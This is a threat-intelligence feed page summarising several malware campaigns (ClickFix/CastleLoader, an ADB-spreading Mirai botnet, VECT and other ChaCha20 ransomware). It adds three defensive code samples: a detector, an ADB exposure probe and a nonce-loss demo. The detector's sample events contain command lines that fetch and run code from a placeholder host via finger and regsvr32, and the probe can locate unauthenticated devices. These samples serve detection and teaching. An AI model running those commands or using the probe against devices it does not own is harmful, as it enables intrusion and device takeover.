ClickFix Removes Your Background but Leaves the Malware

BackgroundFix masquerades as a free image-editing tool but functions as a ClickFix social engineering lure. The fake service prompts users to "verify they are human", silently placing a malicious command on their clipboard; once pasted and run, the command invokes finger.exe to retrieve additional payloads. This chain delivers CastleLoader, which subsequently drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer. The loader uses reflective PE injection, API hashing, and ChaCha20-encrypted C2 communications. CastleStealer targets browser credentials, cryptocurrency wallet extensions, and Telegram sessions, decrypting the browser stores through DPAPI and using the Restart Manager API to release locked database files. The campaign leverages BYOI (bring-your-own-interpreter) tactics with embedded Python interpreters and multiple shellcode stages. A notable implementation flaw exists where launch method 4 references regsrv32.exe instead of the correct regsvr32.exe, so that launch path fails silently.
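Added example, not code from the report or from the campaign: a small Python triage script run over constructed Sysmon-style process-creation events, flagging the two execution primitives the summary names: finger.exe used as a downloader piped into a shell, and regsvr32 launched against a remote scriptlet, including the misspelled regsrv32.exe variant whose launch fails. The event shape, field names and the 203.0.113.0/24 addresses are assumptions for the sample data.

```python
import json
import re

# Constructed process-creation events in a Sysmon-like JSON shape. Illustrative
# only (RFC 5737 documentation addresses); these are not indicators from the report.
SAMPLE_EVENTS = [
    '{"pid": 4120, "parent_image": "explorer.exe", "image": "cmd.exe", '
    '"command_line": "cmd.exe /c finger admin@203.0.113.10 | cmd"}',
    '{"pid": 4188, "parent_image": "cmd.exe", "image": "cmd.exe", '
    '"command_line": "cmd /c regsrv32.exe /s /i:http://203.0.113.10/a.sct scrobj.dll"}',
    '{"pid": 4190, "parent_image": "cmd.exe", "image": "regsvr32.exe", '
    '"command_line": "regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"}',
    '{"pid": 812, "parent_image": "services.exe", "image": "svchost.exe", '
    '"command_line": "svchost.exe -k netsvcs -p"}',
    '{"pid": 5001, "parent_image": "explorer.exe", "image": "powershell.exe", '
    '"command_line": "powershell.exe -NoProfile -Command Get-Process"}',
]

# Each rule is (name, regex over the command line). Names are our own labels.
RULES = [
    # finger <user>@<host>: the finger client fetching content from a remote host
    ("finger-remote-query", re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I)),
    # finger output piped straight into a shell interpreter
    ("finger-piped-to-shell", re.compile(r"\bfinger\b[^|]*\|\s*(?:cmd|powershell)", re.I)),
    # regsvr32 (or the regsrv32 typo) pointed at an http(s) scriptlet via /i:
    ("regsvr32-remote-scriptlet",
     re.compile(r"\bregs(?:vr|rv)32(?:\.exe)?\b.*?/i:\S*https?://", re.I)),
    # the misspelled binary: the launch fails, but the attempt is still worth an alert
    ("regsvr32-misspelled", re.compile(r"\bregsrv32(?:\.exe)?\b", re.I)),
]

# A ClickFix victim pastes into the Run dialog, so the shell's parent is explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}


def parse_events(lines):
    """Parse one JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in lines if line.strip()]


def score_event(event):
    """Return the list of rule names that fire on a single event."""
    cmdline = event.get("command_line", "")
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # Context enrichment: a shell spawned from explorer.exe that also tripped a
    # rule is consistent with a Run-dialog paste.
    if (hits
            and event.get("parent_image", "").lower() in RUN_DIALOG_PARENTS
            and event.get("image", "").lower() in SHELLS):
        hits.append("shell-spawned-from-explorer")
    return hits


def analyze(lines):
    """Return one finding per event that tripped at least one rule."""
    findings = []
    for event in parse_events(lines):
        hits = score_event(event)
        if hits:
            findings.append({"pid": event.get("pid"),
                             "hits": hits,
                             "command_line": event.get("command_line", "")})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["pid"], finding["hits"], finding["command_line"])
```

The misspelling rule is deliberately separate from the scriptlet rule: a process tree showing cmd.exe trying to start regsrv32.exe and failing is exactly the silent failure the summary describes, and it should still raise an alert because the same host will usually carry the other launch methods too.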

Pulse ID: 69f36a0940fe2fa665ebe32e
Pulse Link: https://otx.alienvault.com/pulse/69f36a0940fe2fa665ebe32e
Pulse Author: AlienVault
Created: 2026-04-30 14:41:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #ChaCha20 #Clipboard #CyberSecurity #ICS #InfoSec #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Python #RAT #ShellCode #SocialEngineering #Telegram #bot #cryptocurrency #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

DDoS-for-Hire Operation Exposed: How an Operator's Debug Build Unraveled a Commercial Game-Server Botnet

An exposed open directory on a Netherlands-hosted server revealed the complete operational toolkit of xlabs_v1, a Mirai-derived IoT botnet operated by an actor using the handle Tadashi. The operation provides DDoS-for-hire services specifically targeting game servers and Minecraft hosts through 21 distinct flood attack variants. The botnet spreads by abusing Android Debug Bridge (ADB) exposed on TCP/5555, an attack surface the report estimates at over 4 million potentially vulnerable IoT devices, including Android TV boxes, smart TVs, and routers. The operation features bandwidth profiling to price-tier infected devices, ChaCha20 string encryption with cryptographic weaknesses, and competitor-eradication routines. Infrastructure analysis consolidated the entire operation within a single bulletproof /24 netblock in the Netherlands, with co-located cryptojacking infrastructure also identified.
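Added example, not code from the report or from the xlabs_v1 toolkit: a Python probe that speaks the ADB wire protocol's CONNECT handshake to classify whether a TCP/5555 listener demands RSA key authentication (the device answers AUTH) or accepts unauthenticated sessions (it answers CNXN with its device banner), which is the exposure the botnet abuses. The message layout follows the public ADB protocol description (24-byte little-endian header, payload checksum as the byte sum, magic = command XOR 0xFFFFFFFF); the identity string, the maxdata value and the sample replies are assumptions for the offline check.

```python
import socket
import struct

# ADB protocol constants (command words are the ASCII tags read little-endian).
A_CNXN = 0x4E584E43          # "CNXN"
A_AUTH = 0x48545541          # "AUTH"
AUTH_TOKEN = 1               # AUTH arg0: device is sending a challenge token
A_VERSION = 0x01000000       # original protocol version (assumption: oldest, widest match)
MAX_PAYLOAD = 4096           # maxdata advertised by the original protocol version
HDR = struct.Struct("<6I")   # command, arg0, arg1, data_length, data_check, magic


def _checksum(data: bytes) -> int:
    """ADB's data_check is the plain sum of the payload bytes, modulo 2^32."""
    return sum(data) & 0xFFFFFFFF


def build_message(cmd: int, arg0: int, arg1: int, data: bytes = b"") -> bytes:
    """Serialise one ADB message: header followed by payload."""
    return HDR.pack(cmd, arg0, arg1, len(data), _checksum(data), cmd ^ 0xFFFFFFFF) + data


def build_connect(identity: bytes = b"host::") -> bytes:
    """CONNECT(version, maxdata, identity). Identity string is NUL-terminated."""
    return build_message(A_CNXN, A_VERSION, MAX_PAYLOAD, identity + b"\0")


def parse_message(buf: bytes):
    """Validate header magic, length and checksum; return (cmd, arg0, arg1, data)."""
    if len(buf) < HDR.size:
        raise ValueError("short header")
    cmd, arg0, arg1, dlen, dchk, magic = HDR.unpack_from(buf)
    if magic != (cmd ^ 0xFFFFFFFF):
        raise ValueError("bad magic")
    data = buf[HDR.size:HDR.size + dlen]
    if len(data) != dlen:
        raise ValueError("truncated payload")
    if _checksum(data) != dchk:
        raise ValueError("bad checksum")
    return cmd, arg0, arg1, data


def classify_reply(buf: bytes):
    """Map the device's first reply to an exposure verdict."""
    cmd, arg0, _arg1, data = parse_message(buf)
    if cmd == A_AUTH and arg0 == AUTH_TOKEN:
        return ("auth-required", "")          # ro.adb.secure=1: needs an authorised RSA key
    if cmd == A_CNXN:
        banner = data.rstrip(b"\0").decode("utf-8", errors="replace")
        return ("unauthenticated", banner)    # anyone on the network gets a shell
    return ("unexpected", hex(cmd))


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf


def probe(host: str, port: int = 5555, timeout: float = 3.0):
    """Live check against one host; only use against assets you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect())
        hdr = _recv_exact(sock, HDR.size)
        dlen = HDR.unpack(hdr)[3]
        return classify_reply(hdr + _recv_exact(sock, dlen))


if __name__ == "__main__":
    # Offline demonstration on constructed replies (no network access).
    print(classify_reply(build_message(A_AUTH, AUTH_TOKEN, 0, bytes(20))))
    print(classify_reply(build_message(A_CNXN, A_VERSION, MAX_PAYLOAD,
                                       b"device::ro.product.name=tvbox;\0")))
```

An "unauthenticated" verdict means the device will hand a root-capable shell to any client that can reach port 5555; the fix is to disable network ADB (or enforce key authorisation) and to filter the port at the edge, not to rely on the device never being found.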

Pulse ID: 69f25f09e5c3a33611f7cb16
Pulse Link: https://otx.alienvault.com/pulse/69f25f09e5c3a33611f7cb16
Pulse Author: AlienVault
Created: 2026-04-29 19:42:01

#Android #ChaCha20 #CryptoJacking #CyberSecurity #DDoS #DoS #Encryption #InfoSec #IoT #Minecraft #Mirai #OTX #OpenThreatExchange #RAT #TCP #TheNetherlands #bot #botnet #AlienVault

📱 VECT 2.0: a RaaS ransomware that irreversibly destroys files through a design defect
📝 ## 🔍 Context

Published on 28 April 2026 by Check Point Research (CPR), this article presents an analys...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-vect-2-0-un-ransomware-raas-qui-detruit-irremediablement-les-fichiers-par-defaut-de-conception/
🌐 source : https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/
#ChaCha20 #ESXi #Cyberveille

VECT 2.0: a RaaS ransomware that irreversibly destroys files through a design defect

🔍 Context Published on 28 April 2026 by Check Point Research (CPR), this article presents an in-depth technical analysis of the VECT 2.0 ransomware, a Ransomware-as-a-Service (RaaS) offering that first appeared in December 2025 on a Russian-speaking cybercrime forum. CPR obtained access to the affiliate panel and the builder through a BreachForums account.
🧩 VECT overview VECT is a ransomware written in C++ targeting three platforms: Windows, Linux and VMware ESXi. Version 2.0 was released in February 2026. The group announced partnerships with:

CyberVeille

VECT: Ransomware by design, Wiper by accident

Check Point Research discovered critical flaws in VECT 2.0 ransomware affecting Windows, Linux, and ESXi platforms. A fundamental encryption implementation error causes files larger than 128 KB to be permanently destroyed rather than encrypted. The malware uses ChaCha20-IETF cipher but only saves one of four decryption nonces required for large files, making recovery impossible even after ransom payment. VECT's encryption speed modes are non-functional, thread scheduling degrades performance, and anti-analysis code is unreachable. Despite partnerships with TeamPCP and BreachForums for distribution, the technical implementation demonstrates amateur execution behind a professional facade. The nonce-handling flaw exists across all platform variants since initial deployment, effectively transforming this ransomware into a wiper for enterprise assets including VM disks, databases, and backups.

Pulse ID: 69f0e1a5f1a168738b4eda1a
Pulse Link: https://otx.alienvault.com/pulse/69f0e1a5f1a168738b4eda1a
Pulse Author: AlienVault
Created: 2026-04-28 16:34:45

#AWS #ChaCha20 #CheckPoint #CyberSecurity #Encryption #InfoSec #Linux #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Windows #bot #AlienVault

🔎 VECT destroys large files by discarding decryption nonces. Files over 128 KiB (131,072 bytes) lose three of the four required #ChaCha20 nonces during encryption, making most enterprise data unrecoverable even for the ransomware operators. #ransomNews #ransomware
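Added example, not VECT's code or file format and not from Check Point's analysis: a pure-Python ChaCha20 (IETF variant, 32-byte key, 32-bit counter, 96-bit nonce) used to reproduce the failure mode that the Check Point summary and the ransomNews item above both describe. A file is split into four segments, each encrypted under a fresh random nonce, and the "footer" records only the first nonce. Decrypting with that single nonce recovers segment one and keystream garbage everywhere else, which is why payment cannot restore the data. The segment count, the footer abstraction, the equal-size split and the scaled-down 4 KiB sample file are assumptions; the reported real-world threshold is 128 KiB.

```python
import os
import struct

MASK32 = 0xFFFFFFFF
SEGMENTS = 4  # assumption: four segments, mirroring "one of four nonces" in the summary


def _rotl(v, c):
    return ((v << c) & MASK32) | (v >> (32 - c))


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte keystream block per RFC 8439 (IETF ChaCha20: 32-bit counter, 96-bit nonce)."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k"))
             + list(struct.unpack("<8I", key))
             + [counter & MASK32]
             + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 double rounds (column round then diagonal round)
        for a, b, c, d in ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15),
                           (0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14)):
            _quarter_round(w, a, b, c, d)
    return struct.pack("<16I", *((w[i] + state[i]) & MASK32 for i in range(16)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """XOR data with the keystream; the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(x ^ k for x, k in zip(data[i:i + 64], ks))
    return bytes(out)


def segment_bounds(n: int, segments: int = SEGMENTS):
    """Split n bytes into `segments` contiguous ranges of (nearly) equal size."""
    seg = -(-n // segments)
    return [(i * seg, min((i + 1) * seg, n)) for i in range(segments)]


def encrypt_segmented(key: bytes, data: bytes, segments: int = SEGMENTS):
    """Encrypt each segment under its own random nonce; return (ciphertext, nonces)."""
    nonces, ct = [], bytearray()
    for lo, hi in segment_bounds(len(data), segments):
        nonce = os.urandom(12)
        nonces.append(nonce)
        ct += chacha20_xor(key, nonce, data[lo:hi])
    return bytes(ct), nonces


def decrypt_segmented(key: bytes, ct: bytes, nonces, segments: int = SEGMENTS) -> bytes:
    """Correct decryption: one nonce per segment, in order."""
    pt = bytearray()
    for (lo, hi), nonce in zip(segment_bounds(len(ct), segments), nonces):
        pt += chacha20_xor(key, nonce, ct[lo:hi])
    return bytes(pt)


def footer_keeps_one_nonce(nonces) -> bytes:
    """The modelled defect: the per-file footer stores only the first nonce."""
    return nonces[0]


def decrypt_with_single_nonce(key: bytes, ct: bytes, nonce: bytes, segments: int = SEGMENTS) -> bytes:
    """What a decryptor can do with such a footer: reuse the one nonce for every segment."""
    return decrypt_segmented(key, ct, [nonce] * segments, segments)


def recovered_segments(original: bytes, recovered: bytes, segments: int = SEGMENTS) -> int:
    """Count segments that decrypted back to the original bytes."""
    return sum(1 for lo, hi in segment_bounds(len(original), segments)
               if original[lo:hi] == recovered[lo:hi])


if __name__ == "__main__":
    key = os.urandom(32)
    plaintext = bytes((i * 7 + 3) & 0xFF for i in range(4096))  # constructed 4 KiB "file"
    ct, nonces = encrypt_segmented(key, plaintext)
    good = decrypt_segmented(key, ct, nonces)
    bad = decrypt_with_single_nonce(key, ct, footer_keeps_one_nonce(nonces))
    print("all nonces kept :", recovered_segments(plaintext, good), "of", SEGMENTS, "segments")
    print("one nonce kept  :", recovered_segments(plaintext, bad), "of", SEGMENTS, "segments")
```

Because ChaCha20 is a stream cipher, a wrong nonce does not produce an error, just a different keystream, so the decryptor cannot even detect the failure unless the file carries an integrity check. The three missing nonces are 96 random bits each, so brute force is not an option for the operators either; the only recovery path is a backup that the ransomware did not also reach.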

📱 CrystalX RAT: a new MaaS trojan combining espionage, crypto theft and prank functions
📝 ## 🔍 Context

Published on 1 April 2026 by Kaspersky's GReAT team, this article presents the a...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-02-crystalx-rat-un-nouveau-cheval-de-troie-maas-combinant-espionnage-vol-de-crypto-et-fonctions-de-canular/
🌐 source : https://www.kaspersky.com/blog/prankware-crystalx-rat-maas/55537/
#ChaCha20 #CrystalX #Cyberveille

CrystalX RAT: a new MaaS trojan combining espionage, crypto theft and prank functions

🔍 Context Published on 1 April 2026 by Kaspersky's GReAT team, this article presents the analysis of a new remote access trojan (RAT) named CrystalX, discovered in March 2026 on private Telegram channels. The malware is distributed under a malware-as-a-service (MaaS) model with three subscription tiers.
🧬 Origin and evolution First mentioned in January 2026 in a private Telegram chat for RAT developers, under the name WebCrystal RAT. Identified as a clone of WebRat, a pre-existing RAT. Renamed CrystalX RAT shortly afterwards, with a dedicated Telegram channel created to market it. Tutorial videos published on YouTube under the guise of "educational purposes" make it easy to use.
💣 Malicious capabilities Data theft and surveillance:

CyberVeille
📱 Full technical analysis of the Payload ransomware: a Babuk derivative, Curve25519+ChaCha20, 12 victims
📝 *Full static analysis of the Payload ransomware, derived from the 2021 Babuk source code, using Curve25519+ChaCha...
📖 cyberveille : https://cyberveille.ch/posts/2026-03-21-analyse-technique-complete-du-ransomware-payload-derive-de-babuk-curve25519-chacha20-12-victimes/
🌐 source : https://www.derp.ca/research/payload-ransomware-babuk-derivative/
#Babuk #ChaCha20 #Cyberveille
Full technical analysis of the Payload ransomware: a Babuk derivative, Curve25519+ChaCha20, 12 victims

Full static analysis of the Payload ransomware, derived from the 2021 Babuk source code, using Curve25519+ChaCha20, targeting Windows and ESXi, with 12 victims and 2,603 GB of data exfiltrated.

CyberVeille
VPN Technology in 2025: A Comprehensive Guide to Protocols, Security, and Provider Comparison

Deep dive into VPN technology in 2025: protocol comparison, security features, performance metrics, and detailed provider analysis for streaming, gaming, and privacy

TechLife

Encrypting data, deleting backups, covering tracks: an analysis of the Dire Wolf ransomware

Dire Wolf is a new criminal group whose activity was first observed in May of this year. The cybercriminals' first victims were companies in the technology, finance and construction sectors operating in Italy, Thailand, Australia and India. Their activity is aimed mainly at financial gain. To increase the chance of obtaining a ransom, they use the double extortion technique, threatening...

#Teksty #Chacha20 #Curve25519 #Direwolf #DoubleExtortion #Ransomware

https://sekurak.pl/szyfrowanie-danych-usuwanie-backupow-zacieranie-sladow-analiza-ransomware-dire-wolf/

Sekurak